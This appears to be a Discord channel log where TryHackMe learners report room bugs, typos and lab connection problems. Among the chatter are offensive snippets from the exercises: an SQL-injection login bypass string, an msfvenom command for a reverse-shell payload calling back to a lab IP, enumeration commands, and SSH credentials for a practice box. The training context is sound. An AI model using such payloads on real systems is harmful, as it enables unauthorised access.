#room-bugs

1 messages · Page 6 of 1

blissful reef
#

yes it's something else

celest glen
#

theres 5 different active directory rooms

#

what one are you accessing

blissful reef
#

¯_(ツ)_/¯

blissful reef
celest glen
#

what room

blissful reef
celest glen
#

yeah its not just you

#

thats all I was trying to find

quaint sparrow
#

Probably wrong room linked.

#

And the room that's linked is marked private due to either being broken, or old.

As I can still access it.

quaint sparrow
low roost
#

Threat Intelligence Tools, task 5, "What is the Originating IP address? Defang the IP address." and the Answer format is ****.****.*****.*** no way that's correct.

low roost
#

I'm fool my friend

celest glen
livid escarpBOT
#

Gave +1 Rep to @quaint sparrow

celest glen
#

they already explained it to me 🤣

manic raft
#

Apparently the AD Networks have connectivity problems, i was unable to resolve DNS in the lateral movement and exploiting AD network, restarting the Network and recreating the OVPN file did not help. Yesterday i couldn't ping either, despite the Access page telling me i was connected. More and more people seem to be affected.

quaint sparrow
#

How are you accessing the networks?

quaint sparrow
manic raft
#

i tried both

#

no luck

#

it worked from my VM up until this week without problems

quaint sparrow
#

Did you do the steps?

Ie use the correct vpn.

Edit /etc/resolv.conf

?

manic raft
#

i did

#

i can't access my VM from here unfortunately, i can tell you this evening which subnet i am on

#

the network IP of the lateral movement network is 10.200.64.0 at the moment

#

if that helps

wintry tartan
#

Ah lol, its based on the screenshot, then its fine LOL

wintry tartan
#

HAHA, thanks @dusky junco, i need to get active back again!

livid escarpBOT
#

Gave +1 Rep to @dusky junco

left egret
#

?

lucid verge
atomic jungle
#

How do I add screenshots

quaint sparrow
#

!docs verify

tropic flameBOT
atomic jungle
#

Im pretty sure thats an ICMP request, so the question answer is wrong, right?

atomic jungle
#

Oh

#

You literally mean ping? not an nmap ping request

quaint sparrow
#

Yeah.

atomic jungle
livid escarpBOT
#

Gave +1 Rep to @quaint sparrow

quaint sparrow
#

You're not the first to nmap it, and you won't be the last.

atomic jungle
kind locust
#

On room windowsprivesc20 task 5, the windows defender of the machine catches the msfvenom generated on the part "insecure service permissions"

dusky remnant
#

In the WebOSINT room, Task 2, Question 5. The registared city changed from what the answer should be to

"Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region"

manic raft
#

Not sure if this is a bug or intended but the windows defender is running in the lateralmovement network and blocks and deletes mimikatz

wild geyser
#

Isn't it another typo in this room?

gray maple
#

I need help with one of the links in content discovery

quaint sparrow
#

Which link?

gray maple
#

sitemap.xl

quaint sparrow
#

sitemap.xml ?

gray maple
#

yes

#

I think there might be a problem with vpn

#

even though it says it's connected

quaint sparrow
#

Can you show a screenshot?

gray maple
#

How?

#

Linux

quaint sparrow
#

Linux your host or vm?

gray maple
#

Vm

quaint sparrow
#

Then use Windows Snipping Tool?

gray maple
#

it works now

fervent hearth
#

Room: Linux fundementals part 3
Task: 4

Got my friend confused

quaint sparrow
#

Another good point.

The flag isn't in the tmp folder, it's in the folder the ssh enters.

novel moss
#

in the pentesting fundamentals room, in the info gathering section of the methodologies task, publicly is spelled wrong (publically)

static grotto
#

Incorrect filename: In the Sysmon room, Task 6, the instructions tell you to open Hunting_LSASS.evtx, when it should say :Hunting_Mimikatz.evtx.

fervent hearth
#

small spelling mistake

willow pumice
#

It may be a mistake in the way I am interpreting it, but in the metaploit: exploitation room in the msfvenom section, this one Task question says to use the victim IP, but you have to use the attacking machine IP - it even says ATTACKING in there for some reason in the command too.

Maybe I am missing something, but I even tried also putting the ATTACK IP and it didn't work

fervent hearth
#

or is it like, only the blue ones? kinda weird why they say 16 techniques then. any reason for that?

fervent hearth
copper tide
#

Hello, it seems that this room has a small annoying bug that causes the machine to disconnect after 40 or 50 minutes on. Even though there are still several minutes left of the 2 hours proposed in the paid plan.

https://tryhackme.com/room/vulnnetactive

#

@winged jewel

waxen stream
#

I think I found a bug but will need someone to check if it was a fluke.

room: https://tryhackme.com/room/nmap01
task: 3
question: 1

"What is the first IP address Nmap would scan if you provided 10.10.12.13/29 as your target?"
I accidentally put "10.10.12." and it accepted the answer. after refreshing the page it filled in the correct answer ||10.10.12.8||

waxen stream
#

what are the rules for that? because its not like you can leave a 1 character question blank. id be interested to see how far it can be pushed lol

hazy tiger
waxen stream
livid escarpBOT
#

Gave +1 Rep to @hazy tiger

sly wind
#

Hi! I'm trying to join 'Linux Fundamentals Part 2 & 1' but it's always redirecting me to 'My Rooms' page instead of joining those rooms, and the Part 3 works just fine. Can somebody try and join those rooms to see if this problem can occur with other users or if it's just a problem with me? Thanks in advance!

hallow comet
#

@sly wind I can join Linux fundamental part 1 & 2 with no issue. Try using a different browser, restarting pc, and possibly even wifi

sly wind
hallow comet
sly wind
#

Thanks for the help anyways!

#

I've already sent a ticket. Hope they fix it soon.

hallow comet
#

No worries. Good luck mate

naive osprey
#

i was active yesterday and was at 53 days now i'm at 0. can someone check this out?

acoustic crescent
#

https://tryhackme.com/room/linuxfundamentalspart2 , Task: 5
"Let's use the "cmnatic.pem" file in our initial screenshot at the top of this task."

Screenshot:
tryhackme@linux2:~$ ls -lh
-rw-r--r-- 1 cmnatic cmnatic 0 Feb 19 10:37 file1
-rw-r--r-- 8 cmnatic cmnatic 0 Feb 19 10:37 file2

The Statement should mention "cmnatic" file (there is no .pem), or since ownership has not being explained just "file1"

oak yoke
#

Linux fundamentals pt 1 task 4 whoami request basically it has me signed in as root access however root isn’t the answer so yeah

dusky junco
#

Can't remember off the top of my head what task it is in (probably near the top)

dusky junco
oak yoke
#

Linux fundamentals part 2 where it ask to log in after going through the steps the password doesn’t seem to work for some reason?

acoustic crescent
#

windowsfundamentals1xbx task2
Then arrived Windows 10, which is the current Windows operating system version for desktop computers.
Windows 10
it comes in 2 flavors, Home and Pro. You can read the difference between the Home and Pro here.

Later is mentioned that Windows 11 is the current.

wheat fractal
stiff tundra
stiff tundra
wheat fractal
#

okay lemme try

#

yup

fervent hearth
#

the toolboxvim room is missing an image

static grotto
#

On the Wazuh room, task 6, the highlighted link showing what machine IP you are suppose to be connected to, is static instead of dynamic to the correct active machine IP.

dusky junco
static grotto
livid escarpBOT
#

Gave +1 Rep to @dusky junco

dusky junco
livid escarpBOT
#

Gave +1 Rep to @static grotto

misty gull
hushed lance
misty gull
exotic kelp
quaint sparrow
exotic kelp
#

oh got it thanks

topaz thorn
#

Shouldn't this be timestamp rather than timeline in the diamond model room?

austere igloo
#

I'm copying and pasting the ' OR 1=1;-- text into the password field and hitting Login, and it simply does nothing 😢

rugged canyon
#

-- -

austere igloo
#

I've been informed and double checked that doing this (following the instructions) is all I should need to do for this

austere igloo
rugged canyon
#

oooh blind sqli

#

that is quite different

austere igloo
#

yeah sorry Task 6, Level 2 (probably what got us confused)

rugged canyon
#

probably not a bug... would recommend trying to get help in #room-help

austere igloo
#

thanks I'll drop a message there cheers

rugged canyon
#

good luck and hope someone can figure out how to help

austere igloo
#

but for me, at least, the bypass in the instructions did not work

wheat fractal
#

Holo Network, Task 20, below the SUID permissions explaination screenshot says the following:

Once we have identified a file that we thank may be exploitable, we need to search for an exploit for it.

Should be think

steady ravine
#

No idea where this should go, as it's not really a bug, but regarding the room "Red Team Fundamentals", and probably others, the term of cyber kill chains is used multiple times as a fundamental concept, for example referencing MITRE ATT&CK. I honestly don't understand why, the concept of kill chains is questionable at at best outside of specifically simulated attacks, and MITRE explicitly stated themselves that it should not be used in this way

The ATT&CK framework is not intended to be interpreted as linear—with the adversary moving through the tactics in a straight line (i.e., left to right) in order to accomplish their goal.2 Additionally, an adversary does not need to use all of the ATT&CK tactics in order to achieve their operational goals
https://www.cisa.gov/sites/default/files/publications/Best Practices for MITRE ATTCK Mapping.pdf

Additionally, most incidents are super short, with the most common number of steps in recorded breaches being just one (1). (Verizon Data Breach Investigation Reports).

wheat fractal
#

Room: https://tryhackme.com/room/webenumerationv2

Task 6: There are some virtual hosts running on this server. What are they?

After running gobuster vhost -u http://10.10.35.223 -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt, I get no results

What I tried:

restarting machine
adding webenum.thm to /etc/hosts
adding --append-domain webenum.thm to the gobuster command
updating SecLists
pinging machine

SOLVED

It turns out I was supposed to use gobuster vhost http://webenum.thm instead of the machine IP

(Which is absolutely impossible to know if you're a beginner)

quaint sparrow
#

The screenshots show you to add to the vhost.

#

I understand it might not be beginner friendly, but if you use the vhost name instead of the ip going forward.

wheat fractal
quaint sparrow
#

The ones in the task.

wheat fractal
#

This one?

quaint sparrow
#

No, the ones on Task 6.

#

It shows you adding to the hosts.

But thay screenshot you sent uses the named address.

wheat fractal
#

The issue is that a beginner cannot possibly know he's supposed to use

gobuster vhost http://webenum.thm

#

I can guarantee every beginner will be stuck here trying to run

gobuster vhost http:///MACHINE_IP

rugged canyon
#

gobusters help page on vhosts also says that you probably want to run it against the ip instead of a domain name soooo yeah

quaint sparrow
#

Even going by the screenshots.

THM could possibly reflect the screenshot to say webenum.thm

rugged canyon
#
$ gobuster vhost --help
Uses VHOST enumeration mode (you most probably want to use the IP address as the URL parameter)

Usage:
  gobuster vhost [flags]

Flags:
#

which could also cause confusion

#

though obviously tryhackme can't change the gobuster help page but a note about it somewhere would probably help

wheat fractal
#

Same problem in https://tryhackme.com/room/webenumerationv2

Task 9 --- 2.2. Practical: WPScan (Deploy #2)

When scanning for theme: wpscan --url <URL> --enumerate t

We have to use wpscan webenum.thm --enumerate t instead of the IP of the deployed machine.

Some people might experiment and find this out like I did, but I'm pretty sure some will get stuck

Also

Hint for the version of the theme says the answer is "2.3", but it's actually "2.5"

astral salmon
#

Hi everyone, on the room MalBuster are the answers 3 and 4 not up to date anymore...

wheat fractal
#

Room: https://tryhackme.com/room/uploadvulns
Task: 7

The web app 'java.uploadvulns.thm' doesn't allow legitimate jpeg/jpg file uploads.

I tried multiple pictures, small and big sizes, I tried both .jpg and .jpeg, and I tried a php shell with both .jpg and .jpeg extensions.

The response is always "Invalid File Type".

This can be solved by bypassing the filter, but there is an example of uploading a shell with a legitimate extension (.jpg, .jpeg), intercepting using Burp Suite, and changing the extension back to .php.

This can't be done since the web app doesn't allow any uploads at all without bypassing the filter. 🙂

raw bison
raw bison
livid escarpBOT
#

Gave +1 Rep to @errant grail

stark grail
#

how can share a screenshot for a bug ?

placid abyss
#

!docs verify

tropic flameBOT
placid abyss
#

^^

wheat fractal
#

is it not 18.04.6 ?

quaint sparrow
wheat fractal
#

oh

#

okay

quaint sparrow
#

It tells you above the questions.

calm frigateBOT
#

Done!

hazy tiger
#

Bot do your job

stone tiger
#

Intermediate Nmap ssh couldn't connect .its timeout $ssh ubuntu@10.10.72.110
how can i solve them

stone tiger
quaint sparrow
stone tiger
#

ssh In case I forget - user:pass
ubuntu:Dafdas!!/str0ng

quaint sparrow
#

Where did you get those credentias from?

stone tiger
quaint sparrow
stone tiger
#

yes another box

#

it was time out

quaint sparrow
stone tiger
quaint sparrow
stone tiger
#

ssh <user>@<ip address> -p <port number >

quaint sparrow
#

port number isn't needed.

#

What user name and password are you trying?

stone tiger
#

yes its timeout

quaint sparrow
#

I get that.

#

But what are you using as the password and username??

stone tiger
#

can i use this user: ubuntu pass: Dafdas!!/str0ng

quaint sparrow
#

Yes.

I was able to ssh in using those credentials.

stone tiger
#

but its couldn't working for my pc .

#

ok thank you friend .it's really helpful for me

lost forge
#

Hey guys!
In the AD modules I can't connect to the Lateralmovementandpivoting VPN:
Pinging 10.50.61.172 with 32 bytes of data:
Request timed out.

Even the attackbox doesn't ping the THMDC:
PING 10.200.64.101 (10.200.64.101) 56(84) bytes of data.
From 10.50.61.1 icmp_seq=1 Destination Host Unreachable

#

Please fix this issue

acoustic crescent
sturdy ledge
#

Hello guys

#

I have a doubt

frigid granite
#

Thanks, I just ran into this problem. I can confirm after I did db_disconnect, the post module works fine.
It's actually task 6 on https://tryhackme.com/room/metasploitexploitation

I also noticed that my guacamole shell resets every time I switched from the victim to the attacker machine.
If this can't be avoided, I think it would be good to mention to run the shell.elf in the background with ./shell.elf & or to open the two machines in separate tabs.

livid escarpBOT
#

Gave +1 Rep to @drifting kindle

rugged canyon
#

brainstorm has only 3 ports open but the answer to the question how many ports are open is 6 for some reason

#

should be a quick fix to just change the answer

tame karma
#

This is minor but there is an extra space in a number. It's the new Risk Management Room, Task 6 in the last equation. It says "ALE = SLE × ARO = $9000 × 0.5 = $4, 500.. It should say "ALE = SLE × ARO = $9000 × 0.5 = $4,500 " without a space after the comma and without the period at the end.

chilly geyser
#

Hello, can anyone tell me how to resolve an issue I am having with the Wireshark 101 room? I can not submit my answers after I input them. Either submit or completed none is functional

chilly geyser
#

Do not worry guys, I figured it out. Thanks

hidden spoke
#

dm'd. Not gonna spam here

nimble locust
#

everything OK? Dont hesitate to DM if there's trouble

digital mural
#

In the room Risk Management, Task 7 Respond to Risk, one of the scenarios has the before the safeguard EF at 1% and after the safeguard EF at 10%. When I run the calculations, I seem to always get this one incorrect. Not sure if this is a bug or I'm making a mistake in my calculations, but for the EF to increase after the safeguard, seems like a bug.

Asset: Laptop
Risk: Malware
Asset Value: 2000
EF: 1%
ARO: 2

Safeguard: Antivirus license
Cost of Safeguard: $20
EF after Safeguard: 10%

hard coral
#

Not sure if this counts as a bug, but doing the passive reconnaissance room, Task 6 (shodan) it asks

Based on Shodan.io, what is the 3rd most common port used for nginx?

The answer is 888 but the search now states 5001

gleaming shadow
#

Wait why are people using 5001 now?

dusky junco
gleaming shadow
#

Even on a reverse proxy though, the exposed port is nginx's not whatever node app is running behind

dusky junco
#

yeah true I guess it just depends how shodan is crawling it

hollow sapphire
#

Hello everyone,
I'm stuck with the question below
Referencing the dmarcian SPF syntax table, what prefix character can be added to the "all" mechanism to ensure a "softfail" result?

I answered v=spf1 ~all but it does accept the answer

This room is on SOC ANALYST 1 - Phishing - phishing prevention - Task 2 - SPF.

frigid granite
#

I think https://tryhackme.com/room/introtoshells -> Task 9 question 3 should be linux/x64 and not windows x64:|| msfvenom -p windows/x64/meterpreter/reverse_tcp -f elf -o shell LHOST=10.10.10.5 LPORT=443||

rugged canyon
#

think you got it through due to answer tolerances

frigid granite
livid escarpBOT
#

Gave +1 Rep to @rugged canyon

rugged canyon
# frigid granite Now it says linux. Thanks for fixing it!

shadow did not fix it... on tryhackme if you submit an answer and it is very few letters off it will take it as the correct answer.... when you reload the page after it shows you the correct answer to the question in the submission box

frigid granite
rugged canyon
#

don't think there is any denylist available for question answers

frigid granite
#

Nevermind about the powershell. I tried it again and now it's working

misty gull
wheat fractal
#

the assembly emulator is not working the x86 Assembly crash course room

#

is it just me or someone has the same problem?

compact quartz
#

Exploiting AD Network Task 2:
Under „AddMember“ it says „Start PowerShell (either in RDP or via SSH) on the THMJMP1 host“, with this probably THMWRK1 is meant.

This isn‘t a bug but I wanted to report it anyways to avoid confusion, didn‘t know where else to post it.

sand harbor
#

hello guys, I'm currently following the CTI module, however, in the TI Tools room, task 5, "phishtool", the VM has no access to internet, hence, I can't use firefox with phishtool. I raised a ticket but it will take long time, I suppose.
as I have no time to lose 😄 could anyone send me the last 2 answers?

I would really like to complete this room today

quaint sparrow
primal tundra
#

hi, cant access any path or module

#

trying to upload now picturues to show what I mean

modern comet
#

Windows Fundamentals 2, Task 5, Question: What is listed under System Name?
It's meant to be What is the value of System Name? instead.
At first sight, I thought it was asking for System Manufacturer.
I don't know If It counts as a room-bug. Please inform me

signal tundra
#

lol no.

#

I think that's a language symantic thing, just my take

primal tundra
quaint sparrow
tropic flameBOT
tall wraith
#

hey guys, anyone else have an issue with the MySQL service not being started on the ContainMe box?

{unix_user}@host2:~$ mysql -u{some_user} -p{some_password}
mysql -umike -ppassword
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 2002 (HY000): Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2)
wheat fractal
modern comet
fluid latch
#

Hi ibadov, replying a bit late. The form actually works... if you use a space between each number. It took me time to figure it out. I don't get why the code is not simply stripping them before checking the answer...

quartz iris
#

Hi, this may not be a bug as it seems more like a typo but in the OWASP API Security Top 10-1 room under task 4 it asks you to add an Authorisation-Token header, but it seems to only work with the American Authorization-Token spelling.

wheat fractal
solemn hedge
wheat thistle
#

In the risk management room, the copy button of the final task copies the wrong Flag. 🙂

sinful hound
#

Not sure if this is caused by my bionic reading extension, but there's some non-breaking space characters in the Conclusion section of the Security Engineer Intro room.

blissful reef
manic island
glad badger
livid escarpBOT
#

Gave +1 Rep to @manic island

solemn tundra
#

hey there is a question in room SSDLC which i finally worked out the answer to it but it makes no sense.
question is

When do you typically carry out Vulnerability Assessments or Pentests?

now an answer that would make sense is , once a year or after upgrade etc.

am i allowed to say what the answer is?

gleaming shadow
#

I think they mean the first pentest

solemn tundra
#

task 7 in SSDLC

#

the answer isnt a when though , its a what.

its like asking 'when do you get your car serviced and you answer
mechanic & automotive

makes no sense

gleaming shadow
#

So when makes sense in that context

solemn tundra
#

maybe if the question was during what phase, during when, or at least have the answer include DURING such n such PHASE. wasted like 30 min trying to work out a "when" answer lol

gleaming shadow
#

I mean if you read the task it would be obvious enough 😉

oblique panther
lost bay
#

Hello, I'm not sure where to post my message and I apologize if I'm not in the right place.

Is it normal that I experience a lot of lag on remote machines (I've tested 2: pickle rick & Basic Pentesting) and the problem is the same everywhere:

  • loss of ping
  • loss of connection
  • temporary inaccessibility
  • ...

this makes it impossible to work, is the probeemen coming from me ?

desert elbow
#

Hey all, I'm having an issue with oh my webserver where port 80 is not open. Is that intended?

snow spire
#

^

foggy rock
blissful reef
vapid wigeon
waxen stream
#

On the risk management room when I got to the very end if I hit copy on the flag it gives me this random other flag instead of the correct one.

#

I assume its an old flag from before the update? idk

oblique panther
#

Is it issue solved, if it issue didn't fixed, you can try copy-paste from source code ?

waxen stream
#

mine? I just copy pasted it manually and that works. its only if you hit the copy button there on the side i think

#

I had to do the last part twice cuz my stupid ass closed it before hitting paste just assuming it would have copied the right thing lol

oblique panther
#

Okey, no problem, if your issue is solved is good, congratulations again.

polar geode
#

So a member of my team created a room and gave it out to the team but it seems like the people who have premium are the only ones getting nmap results back. Is there an issue with free users not being able to scan private boxes?

oblique panther
livid escarpBOT
#

Gave +1 Rep to @polar geode

polar geode
#

Yes thanks team! Big fan of yall 🙂

glad badger
polar geode
oblique panther
polar geode
#

Just a small extra note, even with my answers they can't connect to the attacking machine

dusky junco
waxen stream
polar geode
livid escarpBOT
#

Gave +1 Rep to @dusky junco

dusky junco
#

No problem. When developing the VM, it's worth to test/consider in mind how it performs for free users and such 🙂 (512MB RAM for free - 1GB RAM for subscriber) by default

polar geode
livid escarpBOT
#

Gave +1 Rep to @dusky junco

covert field
#

Security Engineer paths <- the calculation is wrong 😉

oblique panther
astral bear
#

When I was working on the Lateral Movement and Pivoting room, connection timed out; no servers could be reached.
problem, but there is no problem with the Exploiting Active Directory room. I am using attackbox. Can anyone tell me how to solve this problem?

oblique panther
oblique panther
zinc matrix
#

So I finished Managing Incidents and Network and System Security few days ago and I just noticed some of those progress have been deleted 😮

void ibex
void ibex
#

Room: Splunk: Dashboards and Reports
Task 5: Alerting on High Priorioty Events
VM Name: Splunk_Dashboard
Issue: Alerts not enabled by attached Splunk license in deployed VM. can not follow along with the material.

merry juniper
#

The badge should be given (by what the description says) in the Risk Managment room, and not the Vulnerability Managment.

fickle ivy
#

Room: Gaming Server
Task 1: What is the user flag?
Issue: It says answer incorrect even though the flag is correct

fickle ivy
quaint sparrow
#

What flag do you have?

fickle ivy
quaint sparrow
#

Worked for me. kekw

#

Are you entering the usertxt - also?

last creek
#

Hi team, I completed OWASP API rooms, but there is no badge in my Earned list. Could you help me with that?

oblique panther
quaint sparrow
last creek
#

I completed it before, thanks @oblique panther and @quaint sparrow for your help! I'll reset and copy-paste.

livid escarpBOT
#

Gave +1 Rep to @oblique panther

fickle ivy
#

it worked now nvm idk what was happening...

#

sry to disturb you

oblique panther
livid escarpBOT
#

Gave +1 Rep to @last creek

sand topaz
#

anyone know if the Net Sec Challenge ctf is bugged im doing exactly what the hint is telling me using the right password list to brute force ftp and its not working

quaint sparrow
#

It's not bugged

sand topaz
#

nope my bad i completed the room thank you

dull coyote
#

Hello,
I think the "Internal" room is broken.
It is impossible to load the wordpress part.
Only the "blog" page loads without the css and I can't access the wp-login page to continue.

quaint sparrow
dull coyote
# quaint sparrow White page?

I get this error message on wp-login:

Hmm. We're having trouble finding that site.

We can't connect to the server at internal.thm.

If you entered the right address, you can:

    Try again later
    Check your network connection
    Check that Firefox has permission to access the web (you might be connected but behind a firewall)
quaint sparrow
dull coyote
dull coyote
dull coyote
livid escarpBOT
#

Gave +1 Rep to @quaint sparrow

fervent hearth
#

in the h4cked room you have to guess the pentestmoney.net url because the site doesn't exist anymore. it also renders the question invalid.

hazy tiger
#

If that’s the AttackBox, I don’t know what happened there

fervent hearth
#

now it works confusedstare

somber epoch
#

Issue with displaying split view / full screen in the room Velociraptor.

Regardless of browser, extensions, OS, incognito or not. I just end up with a white split view or land on a about:blank#blocked.
So far I've tried Edge, Chrome and Firefox. Incognito and no incognito.
Cleared Browser Cache and cookies.
On host machine (win10), vm with win10, and a kali vm.
On the vm's I've tried to use the tryhackme vpn to circumvent any network blocks on my local network.

oblique panther
quaint sparrow
#

No, there is nothing I can do about that.

somber epoch
#

So is it on tryhackmes end this problem?

uncut aspen
#

Issue with Virtualization and Containers room. Unable to connect to 10.10.64.0:5000

#

Would love to post a screenshot but seems this discord server won't let me.

wheat fractal
#

hey, I don't know if this counts as a bug, but I think something is wrong with the cluster in https://tryhackme.com/room/virtualizationandcontainers Virtualization and Containers task 6. I don't really know kubernetes much, but it looks like there is no proper communication and requests are timing out.

#

The app in task 5 runs just fine, btw. I was able to access in in the browser after initiating a container.

uncut aspen
#

Do you have the answer for task 5?

wheat fractal
#

hahaha, that's funny. I don't know how backend works, maybe too many people at once try to connect. yeah, I do, you can DM me.

oblique panther
#

Exactly may be two reason of this issue, one of these the computer may don't found the right route and second of these, may be much more request on the tryhackme server.

wheat fractal
#

I know it can't communicate, because error messages say that, but I don't know if it fails because of some misconfig or too many requests.

oblique panther
marsh turtle
#

Hello! I was going to do simpleCTF and saw the room is private, what happened? Is this a bug?

quaint sparrow
marsh turtle
#

oh! awesome! thank you!

quaint sparrow
#

Happy hacking! blobfingerguns

chilly mango
#

These rooms are very high quality. However, I do come across the occasional typo. Should I inform someone or leave them alone for the most part?

quaint sparrow
rugged canyon
#

which is where they currently are

#

so yeah report typos here and hopefully they get fixed in a timely manner

chilly mango
#

In task 9 under "Discretionary access control"

#

Was kinda a hard read till I noticed "with" instead of "will"

shell ether
#

Logging for Accountability -> Splunk page loads partially, has the Splunk Enterprise logo with the green text background and a "Server Error" message. I have tried multiple times, last night and today using different machine instances, all to get the same page.

#

Also, I let it sit for 20+ minutes to give it plenty of time to load

chilly mango
heavy tusk
#

OWASP Juice Shop was really unsatisfying i solved all the tasks and most of them won't give me back the flag i searched for online solutions and i really copy-pasted the flags to move forward.

oblique panther
jaunty estuary
#

In the room OWASP API Security Top 10 -1 Task 4, it says to use the header Authorisation-Token but it will return a 403 Forbidden because the header should be Authorization-Token (z instead of an s).

oblique panther
ornate solar
#

Hi guys

#

I want to report a concept issue which I am not sure about, In here the last arrow should be in the opposite direction right?

#

since POP3S used to retrieve not send emails

oblique panther
ornate solar
#

Sorry, still dont get it?

#

how would a client send an email using POP3S, POP3S is used to retrieve emails

#

this screenshot taken from the same room

#

Network Security Protocols

oblique panther
# ornate solar Sorry, still dont get it?

Because, there is an authentication and during authentication it is need to use an algorithm the client, and exactly in here the client sending by encrypting the email by using the algorithm that wants of the server.

ornate solar
#

do u mean that this email is The email sent by a client to ask the server to retrieve its emails?

oblique panther
ornate solar
#

Where is the retreival part?

oblique panther
#

Can you look on the photo ?

ornate solar
#

StartTLS is used For encryption

#

The question is, after encryption where is the email I requested from the server?!

oblique panther
ornate solar
#

I get what you say but as I am completely sure, that retrieving the email is part of POP3S

oblique panther
ornate solar
#

ok ty ty

#

I was just confused about the last arrow, I mean sending an encrypted email, Not the previous steps

oblique panther
ornate solar
#

Ty @oblique panther

livid escarpBOT
#

Gave +1 Rep to @oblique panther

oblique panther
livid escarpBOT
#

Gave +1 Rep to @ornate solar

jaunty estuary
flat socket
#

I believe @ornate solar is right and that the encrypted email is sent from the server to the client.

#

So the arrow should be to the left from everything I've gathered

rough musk
#

Not sure if this is the right place, but talking to some people, we may want to update “Intro to C2” as Armitage is no longer kept up with, and is not really a relevant tool to the Red Team path

dark raptor
#

https://tryhackme.com/room/burpsuiteintruder
In Burp Suite: Intruder Room: Regarding this stmt: "Note: You should be getting 302 status code responses for every request in this attack. If you see 403 errors, then your macro is not working properly."

Out of 100 Intruder Requests, I get seven 403's every time when I do this exercise. My attack does find the correct solution, but am curious why my experience doesn't match the above note, namely "every request should be a 302"??

Suggestion: Edit the wording to something like "Note: You should be getting 302 status code responses for almost every request in this attack. If you see a majority of 403 errors, then your macro is not working properly."

wheat fractal
dark raptor
dark raptor
wheat fractal
dark raptor
#

ok so an unwelcome "built in delay" baked into your internet. "It's a feature, not a bug!" lol

obsidian kiln
#

Not sure why you're getting a mixture of status codes though, and I don't have access to debug now 🤷‍♂️

#

The thmlabs.com domain isn't proxying through Cloudflare either -- not sure if you were using that or not

raw bison
dark raptor
raw bison
#

I'll have a look if it might be something in regards to resources of the machine

robust hamlet
#

Hello, I can't access the wreath machine, I have the correct vpn but cannot even ping it, is it normal?

dark raptor
# raw bison Mhh, I just tried it and all I got was 1 403

Thanks for checking. My overall purpose was to soften the language around the Note section in the content of the room (see my original post) , so people don't get thrown by a few 403s, thinking they are doing something wrong. Also, from a learning perspective, it's always great to explore anomalies and unexpected behavior, especially with the room creator;)

livid escarpBOT
#

Gave +1 Rep to @raw bison

hot turret
#

In the manual discovery - Framework stack room of web fundamentals path. Task 6 asks you to view the thm-framework-login directory on the website to get a flag. On viewing that directory I get no flag though.

clear hornet
hot turret
#

"Let's take a look at that website. Viewing the documentation page gives us the path of the framework's administration portal, which gives us a flag if viewed on the Acme IT Support website."

#

That quote talks about the framework link

clear hornet
#

mhm, that is correct, you need to login from there to get the flag, the documentation page tells you the creds

hot turret
#

sigh, why does my brain work like this. Ty and sorry for the bother

clear hornet
#

haha, no worries, sometimes we just miss the most obvious things

flat socket
#

I don't have the Red teamer title (only the security warroir), but it's displayed as Red teamer in the leaderboards

flat socket
#

Ah, okei

#

Is it because of the 1337 level?

quaint sparrow
#

I don't think they've changed the rank name in places.

If you use your thm profile badge. It still says it's lucky which was a rank 3 ranks.

oblique panther
random narwhal
#

I can't access website through firefox but I can curl it

oblique panther
random narwhal
#

no because web browser is fine i can access other websites and locally hosted websites

random narwhal
quaint sparrow
livid escarpBOT
#

Gave +1 Rep to @quaint sparrow

random narwhal
#

and any way to improve this

quaint sparrow
random narwhal
rugged canyon
random narwhal
rugged canyon
#

-T4 or -T5 are the easiest ways to speed up nmap

quaint sparrow
random narwhal
#

but none are showing up

rugged canyon
#

-F is a sane alternative if you don't need to check all ports

rugged canyon
grand onyx
#

Hi, I'm trying the MrRobot lab and when I scan with Nmap the first scan displayed ports 443 open. I was unable to browse to it, I have scanned again and this time port 443 is not showing on the scan. Anyone else experienced such issues?

rugged canyon
grand onyx
rugged canyon
#

3-7 mins

rugged canyon
#

and there is no limits on how many times you can do that as far as shadow has heard or seen

grand onyx
livid escarpBOT
#

Gave +1 Rep to @rugged canyon

random narwhal
ornate solar
#

Hi, I want to report a typo that is misleading in OWASP API Security Top 10 - 1 room, it asks you to put this Authorisation-Token header in header field, but the problem is it will get u 403 forbidden if u try it like this and you will be stuck unless you make it Authorization-Token using z instead of s

sinful hound
#

I cannot for the life of me get the attack boxes working in Microsoft Windows Hardening or Active Directory Hardening, it just loads a white screen on both, thought it was my shitty laptop but doing it on my desktop now too

late mural
#

anyone knows why i can never connect to the site in the vulnersity room? It shows me the connection cannot be made and then when usin gobuster once again i get an error (which i am guessing is related to the one with the site)

hazy tiger
agile heart
#

just wanted to mention, that in the room 'cryptographyinfo' task 7 (in the security engineer pathway), when you let the MS screen reader (using latest Edge) play on the tables, it creates an empy column when jumping between entries, making it a 3x3 (excluding headers here) table from the 3x2 original. Not yet a well established hacker, but I think you could exploit this, no?

last creek
heavy tusk
#

Jr. Penetration tester
"What is the shell ?" Room. I'm not able to get a response from the Windows server when i upload the php code and modify the url it keeps showing only white screen without connecting to my listener

late mural
quaint sparrow
late mural
livid escarpBOT
#

Gave +1 Rep to @quaint sparrow

unborn pulsar
#

In the room, HaskHell (https://tryhackme.com/room/haskhell), when uploading the reverse shell, it results in an 'Internal Server Error'. I tried to upload it (in haskell format) a couple of times in the last few days, but the results were the same.

runic otter
#

top write up referenced in the vid is dead in vulnversity

unborn pulsar
runic otter
#

The video on the main page, I didn't use it, but was interested in how easy it could have been done. It references a walkthrough in the video, which is at the top of the list provided, but it no longer exists. Just thought I'd mention.

rugged canyon
#

in throwback task 31 the first image is not loading or does not exist

woven saddle
#

Hello, I would like to report a small mistake in the room "Windows Fundamentals 1" in Task 2 - Windows Editions. The sentence "Then arrived Windows 10, which is the current Windows operating system version for desktop computers" is wrong because the current Win OP is Windows 11.

unborn pulsar
crude sundial
rugged canyon
#

if you are refering to task 7 that is intended but don't think so for task 6

crude sundial
#

Wait ill try it once more in a bit and

crude sundial
#

yeah it was task6

rugged canyon
#

ah wait of course

crude sundial
#

so it's not?

rugged canyon
#

yeah it is probably intended or technically a side effect of which binaries you can run as sudo

#

assuming you used one of those to read the flag

crude sundial
#

i didnt use anything

#

just went to the directory and used cat

rugged canyon
#

wait you just used cat ????

#

oh wow

crude sundial
#

yeah

rugged canyon
#

yuup that is a bug in the permissions of the file then

#

thanks for reporting

crude sundial
#

ah ok

#

there's also some issue with nano

#

it says "problems with file history"

rugged canyon
#

